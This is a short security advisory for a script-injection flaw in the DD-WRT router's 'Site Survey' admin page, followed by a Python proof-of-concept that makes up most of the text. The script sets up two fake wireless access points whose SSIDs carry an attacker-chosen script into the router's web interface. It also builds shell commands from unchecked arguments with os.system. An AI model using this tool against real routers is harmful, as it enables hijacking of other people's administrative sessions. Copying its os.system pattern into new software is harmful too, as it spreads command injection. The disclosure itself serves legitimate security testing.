source: https://www.securityfocus.com/bid/30573/info
DD-WRT is prone to a script-injection vulnerability because it fails to adequately sanitize user-supplied data to the 'Site Survey' section of the administrative web interface.
Attackers can exploit this issue to execute arbitrary script code in the DD-WRT web interface.
Versions prior to DD-WRT 24-sp1 are vulnerable.
#!/usr/bin/env python
#
# This tool is distributed under a BSD licence. A copy of this
# should have been included with this file.
#
# Copyright (c) 2008, Rafael Dominguez Vega.
#
# This tool is designed for the purpose of performing security
# testing only and is not intended to be used for unlawful
# activities.
#
# This tool can be used to check for SSID script injection
vulnerabilities
# in different sofware products.
#
# Help can be viewed by running this file with --help.
#
#
# Author: Rafael Dominguez Vega
# Version: 0.0.2
#
# Further information: rafael ({dot}) dominguez-vega <(at)>
mwrinfosecurity {(dot)} com
#
import optparse
import sys
import os
import time
from optparse import OptionParser
class OptionParser (optparse.OptionParser):
def check_required (self, opt):
option = self.get_option(opt)
if getattr(self.values, option.dest) is None:
self.error("%s option not supplied" % option)
parser = OptionParser()
parser.add_option("-i", "--interface1", action="store",
dest="ap1",help="Network interface for first Access Point (required)")
parser.add_option("-j", "--interface2", action="store", dest="ap2",
help="Network interface for second Access Point (required)")
parser.add_option("-s", "--ssid1", action="store", dest="ssid1",
help="SSID for first Access Point. Between double quotes (\"\") if
special characters are used (required)")
parser.add_option("-t", "--ssid2", action="store", dest="ssid2",
help="SSID for second Access Point. Between double quotes (\"\") if
special characters are used (required)")
(options, args) = parser.parse_args()
parser.check_required("-i")
if options.ap1:
ap1 = options.ap1
else:
sys.exit(0)
parser.check_required("-j")
if options.ap2:
ap2 = options.ap2
else:
sys.exit(0)
parser.check_required("-s")
if options.ssid1:
ssid1 = options.ssid1
else:
sys.exit(0)
parser.check_required("-t")
if options.ssid2:
ssid2 = options.ssid2
else:
sys.exit(0)
ssid1 = ssid1.replace("<", "\<")
ssid1 = ssid1.replace(">","\>")
ssid1 = ssid1.replace("(","\(")
ssid1 = ssid1.replace(")","\)")
ssid1 = ssid1.replace("$","\$")
ssid1 = ssid1.replace("&","\&")
ssid1 = ssid1.replace(";","\;")
ssid1 = ssid1.replace("|","\|")
ssid1 = ssid1.replace("*","\*")
ssid1 = ssid1.replace(" ","\ ")
ssid2 = ssid2.replace("<", "\<")
ssid2 = ssid2.replace(">","\>")
ssid2 = ssid2.replace("(","\(")
ssid2 = ssid2.replace(")","\)")
ssid2 = ssid2.replace("$","\$")
ssid2 = ssid2.replace("&","\&")
ssid2 = ssid2.replace(";","\;")
ssid2 = ssid2.replace("|","\|")
ssid2 = ssid2.replace("*","\*")
ssid2 = ssid2.replace(" ","\ ")
os.system("wlanconfig "+ap1+" destroy")
os.system("wlanconfig "+ap2+" destroy")
print("\n Initialising fake APs...\n")
os.system("wlanconfig "+ap1+" create wlandev wifi0 wlanmode ap bssid")
time.sleep(3)
os.system("iwconfig "+ap1+" essid "+ssid1)
time.sleep(2)
os.system("wlanconfig "+ap2+" create wlandev wifi0 wlanmode ap bssid")
time.sleep(3)
os.system("iwconfig "+ap2+" essid "+ssid2)
print("Payload: "+ssid1+ssid2)